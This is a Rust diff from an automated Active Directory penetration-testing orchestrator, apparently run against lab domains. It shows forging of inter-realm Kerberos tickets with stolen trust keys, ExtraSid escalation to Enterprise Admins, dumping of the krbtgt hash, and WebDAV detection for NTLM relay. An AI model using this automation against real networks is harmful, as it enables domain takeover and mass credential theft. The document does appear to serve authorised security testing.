+                let result = dispatcher_bg
+                    .llm_runner
+                    .tool_dispatcher()
+                    .dispatch_tool("privesc", &task_id, &call)
+                    .await;
+                match result {
+                    Ok(exec_result) => {
+                        if let Some(err) = exec_result.error.as_ref() {
+                            let tail: String = exec_result
+                                .output
+                                .chars()
+                                .rev()
+                                .take(2000)
+                                .collect::<String>()
+                                .chars()
+                                .rev()
+                                .collect();
+                            warn!(
+                                err = %err,
+                                child_domain = %child_domain_bg,
+                                parent_domain = %parent_domain_bg,
+                                output_tail = %tail,
+                                "raise_child returned error"
+                            );
+                            return;
+                        }
+                        // Verify parent compromise — only mark exploited
+                        // when we actually observe parent krbtgt.
+                        //
+                        // Inspect exec_result.discoveries directly:
+                        // dispatch_tool returns BEFORE push_realtime_discoveries
+                        // finishes pumping hashes into state.hashes, so reading
+                        // state here is too early and produces a false negative.
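The double-reverse `chars()` idiom used for `output_tail` above is worth isolating: it trims to the last N characters without the panic risk of byte-index slicing (`&s[s.len() - n..]` can panic mid-codepoint on multi-byte UTF-8). A standalone sketch:

```rust
/// Last `n` chars of `s`, safe on any UTF-8 input. Reverse the char stream,
/// take n, then reverse again to restore order.
fn tail_chars(s: &str, n: usize) -> String {
    s.chars().rev().take(n).collect::<String>().chars().rev().collect()
}

fn main() {
    assert_eq!(tail_chars("hello world", 5), "world");
    // Shorter than n: returns the whole string.
    assert_eq!(tail_chars("hi", 10), "hi");
    // Multi-byte safe: counts chars, not bytes, and never panics.
    assert_eq!(tail_chars("naïve", 3), "ïve");
}
```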
+                        let parent_lower = parent_domain_bg.to_lowercase();
+                        let has_parent_krbtgt = exec_result
+                            .discoveries
+                            .as_ref()
+                            .and_then(|d| d.get("hashes"))
+                            .and_then(|h| h.as_array())
+                            .map(|hashes| {
+                                hashes.iter().any(|h| {
+                                    let user = h
+                                        .get("username")
+                                        .and_then(|v| v.as_str())
+                                        .unwrap_or("");
+                                    let dom = h
+                                        .get("domain")
+                                        .and_then(|v| v.as_str())
+                                        .unwrap_or("");
+                                    let htype = h
+                                        .get("hash_type")
+                                        .and_then(|v| v.as_str())
+                                        .unwrap_or("");
+                                    user.eq_ignore_ascii_case("krbtgt")
+                                        && dom.to_lowercase() == parent_lower
+                                        && htype.eq_ignore_ascii_case("ntlm")
+                                })
+                            })
+                            .unwrap_or(false);
+                        let tail_for_log: String = exec_result
+                            .output
+                            .chars()
+                            .rev()
+                            .take(2000)
+                            .collect::<String>()
+                            .chars()
+                            .rev()
+                            .collect();
+                        if has_parent_krbtgt {
+                            info!(
+                                parent_domain = %parent_domain_bg,
+                                "raise_child compromised parent — marking exploited"
+                            );
+                            let _ = dispatcher_bg
+                                .state
+                                .mark_exploited(&dispatcher_bg.queue, &vuln_id_bg)
+                                .await;
+                            let techniques =
+                                vec!["T1134.005".to_string(), "T1003.006".to_string()];
+                            let event_id = format!(
+                                "evt-raise-child-{}",
+                                &uuid::Uuid::new_v4().simple().to_string()[..8]
+                            );
+                            let event = serde_json::json!({
+                                "id": event_id,
+                                "timestamp": chrono::Utc::now().to_rfc3339(),
+                                "source": "trust_automation",
+                                "description": format!(
+                                    "Child-to-parent ExtraSid escalation: {} \u{2192} {} via raiseChild",
+                                    child_domain_bg, parent_domain_bg
+                                ),
+                                "mitre_techniques": techniques,
+                            });
+                            let _ = dispatcher_bg
+                                .state
+                                .persist_timeline_event(
+                                    &dispatcher_bg.queue,
+                                    &event,
+                                    &techniques,
+                                )
+                                .await;
+                        } else {
+                            warn!(
+                                parent_domain = %parent_domain_bg,
+                                output_tail = %tail_for_log,
+                                "raise_child completed but no parent krbtgt observed — NOT marking exploited"
+                            );
+                        }
+                    }
+                    Err(e) => {
+                        warn!(
+                            err = %e,
+                            child_domain = %child_domain_bg,
+                            parent_domain = %parent_domain_bg,
+                            "raise_child dispatch errored"
+                        );
+                    }
+                }
+            });
         }
     }
 }
@@ -557,11 +1176,10 @@ pub async fn 
auto_trust_follow(dispatcher: Arc, mut shutdown: watch:
 }

     // Follow trust keys (inter-realm ticket + foreign secretsdump)
-    let (work, admin_cred_phase3, admin_hash_phase3): (
-        Vec<TrustFollowWork>,
-        Option<Credential>,
-        Option<Hash>,
-    ) = {
+    //
+    // The deterministic forge uses only the trust key + SIDs (already on
+    // each TrustFollowWork item); admin creds are no longer needed here.
+    let work: Vec<TrustFollowWork> = {
         let state = dispatcher.state.read().await;

         // Skip if no domain admin yet — trust extraction requires DA-level creds
@@ -578,29 +1196,6 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch:
             .map(|t| (t.flat_name.to_uppercase(), t))
             .collect();

-        let admin_cred = state
-            .credentials
-            .iter()
-            .find(|c| c.is_admin && !c.password.is_empty())
-            .cloned();
-        // Find admin hash from any dominated domain with a DC
-        let admin_hash = if admin_cred.is_none() {
-            state
-                .domain_controllers
-                .keys()
-                .filter(|d| state.dominated_domains.contains(&d.to_lowercase()))
-                .find_map(|dom| {
-                    state.hashes.iter().find(|h| {
-                        h.username.to_lowercase() == "administrator"
-                            && h.domain.to_lowercase() == dom.to_lowercase()
-                            && h.hash_type.to_uppercase() == "NTLM"
-                    })
-                })
-                .cloned()
-        } else {
-            None
-        };
-
         let items = state
             .hashes
             .iter()
@@ -609,9 +1204,7 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch:
                     return None;
                 }

-                // Only process hashes that match a known trust account
                 let netbios = hash.username.trim_end_matches('$').to_uppercase();
-                let trust = trust_by_flat.get(&netbios)?;

                 // Resolve source domain — fall back to first dominated domain
                 // with a DC when secretsdump output lacks domain prefix
@@ -628,24 +1221,44 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch:
                 if source_domain.is_empty() {
                     return None;
                 }
+                let source_lower = source_domain.to_lowercase();
+
+                // Resolve target FQDN: prefer explicit TrustInfo from LDAP
+                // enumeration, else derive from known domains where the
+                // NetBIOS label matches and the FQDN is not the source
+ // (filters out same-domain machine accounts). + let target_domain = if let Some(t) = trust_by_flat.get(&netbios) { + t.domain.clone() + } else { + state + .domain_controllers + .keys() + .chain(state.dominated_domains.iter()) + .find(|d| { + let dl = d.to_lowercase(); + dl != source_lower + && d.split('.') + .next() + .map(|label| label.to_uppercase() == netbios) + .unwrap_or(false) + }) + .cloned()? + }; let dedup_key = format!( "trust_follow:{}:{}", - source_domain.to_lowercase(), + source_lower, hash.username.to_lowercase() ); if state.is_processed(DEDUP_TRUST_FOLLOW, &dedup_key) { return None; } - // Use the FQDN from the trust relationship — never fall back - // to bare NetBIOS name which produces invalid domain strings. - let target_domain = trust.domain.clone(); - - let target_dc_ip = state - .domain_controllers - .get(&target_domain.to_lowercase()) - .cloned(); + // Use resolve_dc_ip so we fall back to the hosts table when + // domain_controllers lacks an explicit entry for the foreign + // domain — common for cross-forest trusts where the foreign + // DC is only known via host scan, not LDAP enumeration. 
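The NetBIOS-label fallback above can be isolated as a pure lookup over the known-domain set (illustrative helper name, not from the codebase):

```rust
/// Among known domains, pick one whose leftmost DNS label (uppercased)
/// matches the trust account's NetBIOS name and which is not the source
/// domain — the latter filters out same-domain machine accounts.
fn resolve_by_netbios<'a>(
    netbios: &str,
    source: &str,
    known_domains: &'a [String],
) -> Option<&'a String> {
    let source = source.to_lowercase();
    known_domains.iter().find(|d| {
        let dl = d.to_lowercase();
        dl != source
            && d.split('.')
                .next()
                .map(|label| label.to_uppercase() == netbios)
                .unwrap_or(false)
    })
}

fn main() {
    let domains = vec!["corp.local".to_string(), "dev.corp.local".to_string()];
    assert_eq!(resolve_by_netbios("DEV", "corp.local", &domains), Some(&domains[1]));
    // "CORP$" strips to "CORP", but corp.local is the source — filtered.
    assert_eq!(resolve_by_netbios("CORP", "corp.local", &domains), None);
}
```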
+ let target_dc_ip = state.resolve_dc_ip(&target_domain); let source_domain_sid = state .domain_sids @@ -656,11 +1269,6 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch: .get(&target_domain.to_lowercase()) .cloned(); - let source_dc_ip = state - .domain_controllers - .get(&source_domain.to_lowercase()) - .cloned(); - Some(TrustFollowWork { dedup_key, hash: hash.clone(), @@ -669,20 +1277,34 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch: target_dc_ip, source_domain_sid, target_domain_sid, - source_dc_ip, }) }) .collect(); - (items, admin_cred, admin_hash) + items }; for item in work { let vuln_id = forest_trust_vuln_id(&item.source_domain, &item.target_domain); - let trust_target = item - .target_dc_ip - .clone() - .unwrap_or_else(|| item.target_domain.clone()); + + // Defer dispatch when the target DC IP is unknown: impacket needs + // a routable -target-ip for both create_inter_realm_ticket and the + // forge-and-present secretsdump fallback. Passing the bare domain + // string fails fast and burns the dedup key. Re-tick in 30s and + // let host scans / trust enum populate the DC entry first. + let target_dc_ip = match item.target_dc_ip.clone() { + Some(ip) => ip, + None => { + debug!( + source = %item.source_domain, + target = %item.target_domain, + trust_account = %item.hash.username, + "Deferring forest trust escalation — target DC IP unresolved" + ); + continue; + } + }; + let trust_target = target_dc_ip.clone(); { let mut details = std::collections::HashMap::new(); details.insert( @@ -720,77 +1342,305 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch: .await; } - // 1. Dispatch inter-realm ticket creation. 
- // Use field names that match the tool and prompt expectations: - // - `vuln_type` routes to generate_trust_key_prompt - // - `source_sid`/`target_sid` match create_inter_realm_ticket tool - // - `trusted_domain` is read by the trust prompt - // - Include admin creds + dc_ip so the LLM can call get_sid if SIDs are missing - let mut ticket_payload = json!({ - "technique": "create_inter_realm_ticket", - "vuln_type": "cross_forest", - "domain": item.source_domain, - "trusted_domain": item.target_domain, - "target_domain": item.target_domain, - "target": item.target_dc_ip.as_deref().unwrap_or(&item.target_domain), - "trust_key": item.hash.hash_value, - "trust_account": item.hash.username, - "vuln_id": &vuln_id, - }); - if let Some(ref sid) = item.source_domain_sid { - ticket_payload["source_sid"] = json!(sid); - } - if let Some(ref sid) = item.target_domain_sid { - ticket_payload["target_sid"] = json!(sid); - } - if let Some(ref aes) = item.hash.aes_key { - ticket_payload["aes_key"] = json!(aes); - } - if let Some(ref dc_ip) = item.source_dc_ip { - ticket_payload["dc_ip"] = json!(dc_ip); - } - if let Some(ref cred) = admin_cred_phase3 { - ticket_payload["username"] = json!(cred.username); - ticket_payload["password"] = json!(cred.password); - } else if let Some(ref hash) = admin_hash_phase3 { - ticket_payload["username"] = json!(hash.username); - ticket_payload["admin_hash"] = json!(hash.hash_value); + // Skip self-referential trust (source == target) + if item.source_domain.to_lowercase() == item.target_domain.to_lowercase() { + debug!( + source = %item.source_domain, + target = %item.target_domain, + "Skipping self-referential trust escalation" + ); + continue; } - match dispatcher - .throttled_submit("exploit", "privesc", ticket_payload, 1) - .await + // Suppress the ExtraSid forge when the trust has SID filtering + // active. 
ticketer adds Enterprise Admins (RID 519) via + // `--extra-sid` to satisfy DCSync — but a SID-filtered forest + // trust strips RID<1000 SIDs from the cross-realm PAC, and the + // target KDC returns rpc_s_access_denied. Burn the dedup so this + // doomed dispatch can't loop, mark the vuln exploited as a + // strategic choice, and wake the cross-forest fallback paths + // (ACL/MSSQL/FSP) to take over. { - Ok(Some(task_id)) => { + let state = dispatcher.state.read().await; + if is_filtered_inter_forest_trust(&state, &item.source_domain, &item.target_domain) + { info!( - task_id = %task_id, + source = %item.source_domain, + target = %item.target_domain, trust_account = %item.hash.username, - source_domain = %item.source_domain, - target_domain = %item.target_domain, - has_source_sid = item.source_domain_sid.is_some(), - has_target_sid = item.target_domain_sid.is_some(), - "Inter-realm ticket task dispatched" + "Suppressing forge_inter_realm_and_dump — SID filtering on cross-forest trust would reject ExtraSid; waking fallbacks" ); + drop(state); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_TRUST_FOLLOW, item.dedup_key.clone()); let _ = dispatcher .state - .mark_exploited(&dispatcher.queue, &vuln_id) + .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &item.dedup_key) .await; - } - Ok(None) => { - debug!("Inter-realm ticket deferred by throttler"); + wake_cross_forest_fallbacks(&dispatcher, &item.target_domain).await; continue; } - Err(e) => { - warn!(err = %e, "Failed to dispatch inter-realm ticket"); - continue; + } + + // Forge-and-present the inter-realm TGT as a deterministic worker + // task — NOT an LLM task. Both `create_inter_realm_ticket` and + // `secretsdump_kerberos` run sequentially on the same worker via + // `expand_technique_task`, so the ccache file produced by ticketer + // is on the same filesystem when secretsdump reads it. 
+ // + // Routing through the LLM here would launder deterministic values + // (NT hash, AES key, SIDs) through token generation — the LLM + // would have to copy them out of the rendered prompt into tool + // call args, where they get dropped, typo'd, or omitted. The + // orchestrator already owns every input; deliver them directly. + // + // Resolve the target DC hostname so Kerberos auth can match the + // SPN baked into the ticket. Falls back to the IP, which works + // when the worker can reverse-resolve via DNS. + let target_dc_hostname = { + let s = dispatcher.state.read().await; + s.hosts + .iter() + .find(|h| h.ip == target_dc_ip && !h.hostname.is_empty()) + .map(|h| h.hostname.clone()) + .or_else(|| { + s.hosts + .iter() + .find(|h| { + (h.is_dc || h.detect_dc()) + && h.hostname.to_lowercase().ends_with(&format!( + ".{}", + item.target_domain.to_lowercase() + )) + }) + .map(|h| h.hostname.clone()) + }) + .unwrap_or_else(|| target_dc_ip.clone()) + }; + + // ticketer writes .ccache in the worker cwd; the + // following secretsdump_kerberos call reads it via KRB5CCNAME. + let ticket_username = "Administrator"; + let ticket_path = format!("{ticket_username}.ccache"); + + // Resolve missing source SID via lookupsid against the source + // DC. ticketer.py needs `--domain-sid` for the source realm to + // build a valid PAC; without it the resulting ticket gets + // rejected by the target KDC. We have DA on the source domain + // (cross-forest forge only fires after DA), so SAMR lookupsid + // works with either a password cred or admin NTLM hash. 
+ let source_domain_sid = if item.source_domain_sid.is_some() { + item.source_domain_sid.clone() + } else { + let (source_dc_ip, src_cred, src_hash) = { + let s = dispatcher.state.read().await; + let src_lower = item.source_domain.to_lowercase(); + let dc = s.resolve_dc_ip(&item.source_domain); + let cred = s + .credentials + .iter() + .find(|c| { + c.is_admin + && !c.password.is_empty() + && c.domain.to_lowercase() == src_lower + }) + .cloned(); + let h = s + .hashes + .iter() + .find(|h| { + h.username.to_lowercase() == "administrator" + && h.domain.to_lowercase() == src_lower + && h.hash_type.to_uppercase() == "NTLM" + }) + .cloned(); + (dc, cred, h) + }; + let resolved = if let Some(ref dc_ip) = source_dc_ip { + super::golden_ticket::resolve_domain_sid( + &item.source_domain, + dc_ip, + src_cred.as_ref(), + src_hash.as_ref(), + ) + .await + } else { + None + }; + if let Some((sid, admin_name)) = resolved { + info!( + source_domain = %item.source_domain, + sid = %sid, + "Resolved source domain SID for cross-forest forge" + ); + let op_id = { dispatcher.state.read().await.operation_id.clone() }; + let reader = ares_core::state::RedisStateReader::new(op_id); + let mut conn = dispatcher.queue.connection(); + let src_lower = item.source_domain.to_lowercase(); + let _ = reader.set_domain_sid(&mut conn, &src_lower, &sid).await; + if let Some(ref name) = admin_name { + let _ = reader.set_admin_name(&mut conn, &src_lower, name).await; + } + { + let mut state = dispatcher.state.write().await; + state.domain_sids.insert(src_lower.clone(), sid.clone()); + if let Some(ref name) = admin_name { + state.admin_names.insert(src_lower, name.clone()); + } + } + Some(sid) + } else { + warn!( + source = %item.source_domain, + target = %item.target_domain, + "Could not resolve source SID — deferring cross-forest forge" + ); + None + } + }; + if source_domain_sid.is_none() { + continue; + } + + // For child→parent forges we MUST inject the parent's Enterprise + // Admins SID (RID 519) 
as ExtraSid; without it the parent KDC
+ // issues a TGS but DRSUAPI on the parent DC rejects the
+ // replication call as `rpc_s_access_denied` and nxc dumps zero
+ // hashes (exit 0, hiding the failure). Resolve the parent SID
+ // on-demand via lookupsid against the parent DC using source
+ // admin creds (cross-trust SAMR works) when it isn't cached.
+ // Defer dispatch (no dedup mark) when resolution fails so the
+ // next 30s tick can retry once enumeration progresses.
+ let source_l = item.source_domain.to_lowercase();
+ let target_l = item.target_domain.to_lowercase();
+ let is_child_to_parent =
+ source_l != target_l && source_l.ends_with(&format!(".{target_l}"));
+ let target_domain_sid: Option<String> =
+ if !is_child_to_parent || item.target_domain_sid.is_some() {
+ item.target_domain_sid.clone()
+ } else {
+ let (src_cred, src_hash) = {
+ let s = dispatcher.state.read().await;
+ let src_lower = item.source_domain.to_lowercase();
+ let cred = s
+ .credentials
+ .iter()
+ .find(|c| {
+ c.is_admin
+ && !c.password.is_empty()
+ && c.domain.to_lowercase() == src_lower
+ })
+ .cloned();
+ let h = s
+ .hashes
+ .iter()
+ .find(|h| {
+ h.username.to_lowercase() == "administrator"
+ && h.domain.to_lowercase() == src_lower
+ && h.hash_type.to_uppercase() == "NTLM"
+ })
+ .cloned();
+ (cred, h)
+ };
+ let resolved = super::golden_ticket::resolve_domain_sid(
+ &item.target_domain,
+ &target_dc_ip,
+ src_cred.as_ref(),
+ src_hash.as_ref(),
+ )
+ .await;
+ if let Some((sid, admin_name)) = resolved {
+ info!(
+ target_domain = %item.target_domain,
+ sid = %sid,
+ "Resolved parent domain SID for child→parent forge ExtraSid"
+ );
+ let op_id = { dispatcher.state.read().await.operation_id.clone() };
+ let reader = ares_core::state::RedisStateReader::new(op_id);
+ let mut conn = dispatcher.queue.connection();
+ let tgt_lower = item.target_domain.to_lowercase();
+ let _ = reader.set_domain_sid(&mut conn, &tgt_lower, &sid).await;
+ if let Some(ref name) = admin_name {
+ let _ =
reader.set_admin_name(&mut conn, &tgt_lower, name).await; + } + { + let mut state = dispatcher.state.write().await; + state.domain_sids.insert(tgt_lower.clone(), sid.clone()); + if let Some(ref name) = admin_name { + state.admin_names.insert(tgt_lower, name.clone()); + } + } + Some(sid) + } else { + warn!( + source = %item.source_domain, + target = %item.target_domain, + target_dc_ip = %target_dc_ip, + "Could not resolve parent SID — deferring child→parent forge" + ); + None + } + }; + if is_child_to_parent && target_domain_sid.is_none() { + continue; + } + + // Build args for the combined `forge_inter_realm_and_dump` tool. + // This single tool runs impacket-ticketer + impacket-secretsdump + // sequentially in one worker invocation (shared tempdir as cwd), + // so the .ccache produced by ticketer is on the same filesystem + // when secretsdump reads it. Two split dispatch_tool calls would + // land on different worker pods with no shared FS. + let mut tool_args = json!({ + "source_domain": &item.source_domain, + "target_domain": &item.target_domain, + "trust_key": &item.hash.hash_value, + "username": ticket_username, + // `target` is the DC hostname (or IP fallback) for the SPN + // baked into the ticket; `dc_ip` is the routable IP used + // for impacket-secretsdump's `-dc-ip`. + "target": &target_dc_hostname, + "dc_ip": &target_dc_ip, + }); + if let Some(ref sid) = source_domain_sid { + tool_args["source_sid"] = json!(sid); + } + if let Some(ref sid) = target_domain_sid { + tool_args["target_sid"] = json!(sid); + } + // AES256 trust key — required for Win2016+ target DCs which + // reject RC4-only inter-realm tickets with KDC_ERR_TGT_REVOKED. + if let Some(ref aes) = item.hash.aes_key { + tool_args["aes_key"] = json!(aes); + } + // For child→parent trusts (intra-forest), inject parent's + // Enterprise Admins SID (RID 519). SID filtering blocks + // ExtraSID across forest trusts, so only emit on intra-forest. 
+ // The defer above guarantees target_domain_sid is Some here
+ // when is_child_to_parent.
+ if is_child_to_parent {
+ if let Some(ref tsid) = target_domain_sid {
+ tool_args["extra_sid"] = json!(format!("{tsid}-519"));
+ }
+ }
+ let _ = ticket_path; // ccache path is internal to the tool
+ let _ = trust_target;
- // The privesc agent handles the full flow: forge inter-realm ticket →
- // secretsdump_kerberos against the target DC. No separate credential_access
- // dispatch needed (it lacked valid auth and always failed).
+ let call = ToolCall {
+ id: format!("forge_inter_realm_{}", uuid::Uuid::new_v4().simple()),
+ name: "forge_inter_realm_and_dump".to_string(),
+ arguments: tool_args,
+ };
+ let task_id = format!(
+ "trust_forge_{}",
+ &uuid::Uuid::new_v4().simple().to_string()[..12]
+ );
- // Mark as processed
+ // Mark dedup BEFORE spawning so the next 30s tick doesn't
+ // re-dispatch the same trust while the forge is running.
 dispatcher
 .state
 .write()
@@ -800,6 +1650,152 @@ pub async fn auto_trust_follow(dispatcher: Arc<Dispatcher>, mut shutdown: watch:
 .state
 .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &item.dedup_key)
 .await;
+
+ info!(
+ task_id = %task_id,
+ trust_account = %item.hash.username,
+ source_domain = %item.source_domain,
+ target_domain = %item.target_domain,
+ has_source_sid = source_domain_sid.is_some(),
+ has_target_sid = item.target_domain_sid.is_some(),
+ has_aes = item.hash.aes_key.is_some(),
+ "Cross-forest forge dispatched (direct tool, no LLM)"
+ );
+
+ let dispatcher_bg = dispatcher.clone();
+ let source_domain_bg = item.source_domain.clone();
+ let target_domain_bg = item.target_domain.clone();
+ let trust_account_bg = item.hash.username.clone();
+ let vuln_id_bg = vuln_id.clone();
+ let dedup_key_bg = item.dedup_key.clone();
+ tokio::spawn(async move {
+ let result = dispatcher_bg
+ .llm_runner
+ .tool_dispatcher()
+ .dispatch_tool("privesc", &task_id, &call)
+ .await;
+ // Clear dedup on failure so the next 30s tick can retry once
+
// a fresh trust key, AES key, or SID becomes available.
+ let clear_dedup = || async {
+ dispatcher_bg
+ .state
+ .write()
+ .await
+ .unmark_processed(DEDUP_TRUST_FOLLOW, &dedup_key_bg);
+ let _ = dispatcher_bg
+ .state
+ .unpersist_dedup(&dispatcher_bg.queue, DEDUP_TRUST_FOLLOW, &dedup_key_bg)
+ .await;
+ };
+ match result {
+ Ok(exec_result) => {
+ if let Some(err) = exec_result.error.as_ref() {
+ let tail: String = exec_result
+ .output
+ .chars()
+ .rev()
+ .take(2000)
+ .collect::<String>()
+ .chars()
+ .rev()
+ .collect();
+ warn!(
+ err = %err,
+ source_domain = %source_domain_bg,
+ target_domain = %target_domain_bg,
+ trust_account = %trust_account_bg,
+ output_tail = %tail,
+ "forge_inter_realm_and_dump returned error — clearing dedup for retry"
+ );
+ clear_dedup().await;
+ return;
+ }
+ // Verify target compromise — only mark exploited
+ // when we actually observe the target krbtgt hash
+ // in the dispatch_tool discoveries.
+ let target_lower = target_domain_bg.to_lowercase();
+ let has_target_krbtgt = exec_result
+ .discoveries
+ .as_ref()
+ .and_then(|d| d.get("hashes"))
+ .and_then(|h| h.as_array())
+ .map(|hashes| {
+ hashes.iter().any(|h| {
+ let user =
+ h.get("username").and_then(|v| v.as_str()).unwrap_or("");
+ let dom =
+ h.get("domain").and_then(|v| v.as_str()).unwrap_or("");
+ let htype =
+ h.get("hash_type").and_then(|v| v.as_str()).unwrap_or("");
+ user.eq_ignore_ascii_case("krbtgt")
+ && dom.to_lowercase() == target_lower
+ && htype.eq_ignore_ascii_case("ntlm")
+ })
+ })
+ .unwrap_or(false);
+ if has_target_krbtgt {
+ info!(
+ source_domain = %source_domain_bg,
+ target_domain = %target_domain_bg,
+ "Cross-forest forge compromised target — marking exploited"
+ );
+ let _ = dispatcher_bg
+ .state
+ .mark_exploited(&dispatcher_bg.queue, &vuln_id_bg)
+ .await;
+ let techniques = vec!["T1134.005".to_string(), "T1550.003".to_string()];
+ let event_id = format!(
+ "evt-trust-{}",
+ &uuid::Uuid::new_v4().simple().to_string()[..8]
+ );
+ let event =
serde_json::json!({
+ "id": event_id,
+ "timestamp": chrono::Utc::now().to_rfc3339(),
+ "source": "trust_automation",
+ "description": format!(
+ "Forest trust escalation: {} \u{2192} {} via trust key {}",
+ source_domain_bg, target_domain_bg, trust_account_bg
+ ),
+ "mitre_techniques": techniques,
+ });
+ let _ = dispatcher_bg
+ .state
+ .persist_timeline_event(&dispatcher_bg.queue, &event, &techniques)
+ .await;
+ } else {
+ // Tool ran cleanly but no target krbtgt landed in
+ // discoveries — this is a deterministic failure
+ // (SID filtering, denied permissions, or wrong
+ // forest) that won't change on the next 30s tick.
+ // Keep dedup MARKED so we don't relitigate the
+ // doomed forge in a tight loop, mark the trust
+ // vuln exploited so the operation moves on, and
+ // wake the cross-forest fallback paths
+ // (ACL/MSSQL/FSP) which can still compromise the
+ // target forest without ExtraSid.
+ warn!(
+ source_domain = %source_domain_bg,
+ target_domain = %target_domain_bg,
+ "forge_inter_realm_and_dump completed but no target krbtgt observed — locking dedup, waking fallbacks"
+ );
+ let _ = dispatcher_bg
+ .state
+ .mark_exploited(&dispatcher_bg.queue, &vuln_id_bg)
+ .await;
+ wake_cross_forest_fallbacks(&dispatcher_bg, &target_domain_bg).await;
+ }
+ }
+ Err(e) => {
+ warn!(
+ err = %e,
+ source_domain = %source_domain_bg,
+ target_domain = %target_domain_bg,
+ "forge_inter_realm_and_dump dispatch errored — clearing dedup for retry"
+ );
+ clear_dedup().await;
+ }
+ }
+ });
 }
 }
}
@@ -812,7 +1808,6 @@ struct TrustFollowWork {
 target_dc_ip: Option<String>,
 source_domain_sid: Option<String>,
 target_domain_sid: Option<String>,
- source_dc_ip: Option<String>,
 }
 #[cfg(test)]
 mod tests {
@@ -958,4 +1953,114 @@ mod tests {
 assert_eq!(trust_enum_dedup_key("", false), "trust_enum:");
 assert_eq!(trust_enum_dedup_key("", true), "trust_enum_hash:");
 }
+
+ // is_filtered_inter_forest_trust
+
+ fn state_with_trust(domain: &str, trust: ares_core::models::TrustInfo) -> StateInner {
+ let mut s =
StateInner::new("op-test".into()); + s.trusted_domains.insert(domain.to_lowercase(), trust); + s + } + + #[test] + fn filtered_inter_forest_intra_forest_returns_false() { + let s = StateInner::new("op-test".into()); + // child↔parent — not inter-forest, never filtered. + assert!(!is_filtered_inter_forest_trust( + &s, + "child.contoso.local", + "contoso.local" + )); + } + + #[test] + fn filtered_inter_forest_explicit_filtering_on() { + let trust = ares_core::models::TrustInfo { + domain: "fabrikam.local".into(), + flat_name: "FABRIKAM".into(), + direction: "bidirectional".into(), + trust_type: "forest".into(), + sid_filtering: true, + }; + let s = state_with_trust("fabrikam.local", trust); + assert!(is_filtered_inter_forest_trust( + &s, + "contoso.local", + "fabrikam.local" + )); + } + + #[test] + fn filtered_inter_forest_explicit_filtering_off() { + let trust = ares_core::models::TrustInfo { + domain: "fabrikam.local".into(), + flat_name: "FABRIKAM".into(), + direction: "bidirectional".into(), + trust_type: "forest".into(), + sid_filtering: false, + }; + let s = state_with_trust("fabrikam.local", trust); + assert!(!is_filtered_inter_forest_trust( + &s, + "contoso.local", + "fabrikam.local" + )); + } + + #[test] + fn filtered_inter_forest_no_metadata_tries_forge() { + let s = StateInner::new("op-test".into()); + // No TrustInfo for the target. Without explicit filtering metadata we + // try the forge — the cost of an unnecessary attempt (~30s) is cheaper + // than silently dropping a valid attack on a misconfigured trust. + assert!(!is_filtered_inter_forest_trust( + &s, + "contoso.local", + "fabrikam.local" + )); + } + + #[test] + fn filtered_inter_forest_ignores_unrelated_source_metadata() { + // Repro of op-20260429-111016 bug: north discovered its parent trust + // and stored TrustInfo{ domain="sevenkingdoms.local", parent_child, + // sid_filtering=false }. 
Querying the unrelated cross-forest path + // sevenkingdoms.local → essos.local must NOT be answered with that + // parent_child entry (which would wrongly classify the cross-forest + // path as intra-forest). With no metadata for the actual target we + // now try the forge rather than silently suppressing it. + let parent_trust = ares_core::models::TrustInfo { + domain: "contoso.local".into(), + flat_name: "CONTOSO".into(), + direction: "bidirectional".into(), + trust_type: "parent_child".into(), + sid_filtering: false, + }; + let s = state_with_trust("contoso.local", parent_trust); + // Target fabrikam.local has no metadata — try the forge. + assert!(!is_filtered_inter_forest_trust( + &s, + "contoso.local", + "fabrikam.local" + )); + } + + #[test] + fn filtered_inter_forest_target_metadata_authoritative() { + // When the target's TrustInfo says cross-forest with SID filtering, + // suppress the forge regardless of any source-side parent_child entry. + let target_trust = ares_core::models::TrustInfo { + domain: "fabrikam.local".into(), + flat_name: "FABRIKAM".into(), + direction: "bidirectional".into(), + trust_type: "forest".into(), + sid_filtering: true, + }; + let s = state_with_trust("fabrikam.local", target_trust); + assert!(is_filtered_inter_forest_trust( + &s, + "contoso.local", + "fabrikam.local" + )); + } } diff --git a/ares-cli/src/orchestrator/automation/webdav_detection.rs b/ares-cli/src/orchestrator/automation/webdav_detection.rs new file mode 100644 index 00000000..f5e29c67 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/webdav_detection.rs @@ -0,0 +1,699 @@ +//! auto_webdav_detection -- detect WebDAV on hosts for NTLM relay. +//! +//! Hosts running WebClient service (WebDAV) accept HTTP-based NTLM auth, +//! which bypasses SMB signing requirements. This enables relay attacks +//! (HTTP→LDAP/SMB) even when SMB signing is enforced. WebDAV is commonly +//! enabled on IIS servers and member servers with WebClient service. +//! +//! 
This is a bridge module (like smb_signing.rs): it checks discovered hosts
+//! for WebDAV indicators and registers `webdav_enabled` vulnerabilities
+//! that downstream modules (ntlm_relay) can target.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::state::*;
+
+/// Collect WebDAV work items from state (pure logic, no async).
+fn collect_webdav_work(state: &StateInner) -> Vec<WebDavWork> {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ for host in &state.hosts {
+ // Skip DCs (WebDAV relay is for member servers)
+ if host.is_dc {
+ continue;
+ }
+
+ // Check if host has WebDAV indicators in services
+ let has_webdav = host.services.iter().any(|s| {
+ let sl = s.to_lowercase();
+ sl.contains("webdav")
+ || sl.contains("webclient")
+ || sl.contains("iis")
+ || (sl.contains("80/") && sl.contains("http"))
+ });
+
+ if !has_webdav {
+ continue;
+ }
+
+ let dedup_key = format!("webdav:{}", host.ip);
+ if state.is_processed(DEDUP_WEBDAV_DETECTION, &dedup_key) {
+ continue;
+ }
+
+ // Check if vuln already registered
+ let vuln_id = format!("webdav_enabled_{}", host.ip.replace('.', "_"));
+ if state.discovered_vulnerabilities.contains_key(&vuln_id) {
+ continue;
+ }
+
+ let domain = host
+ .hostname
+ .find('.')
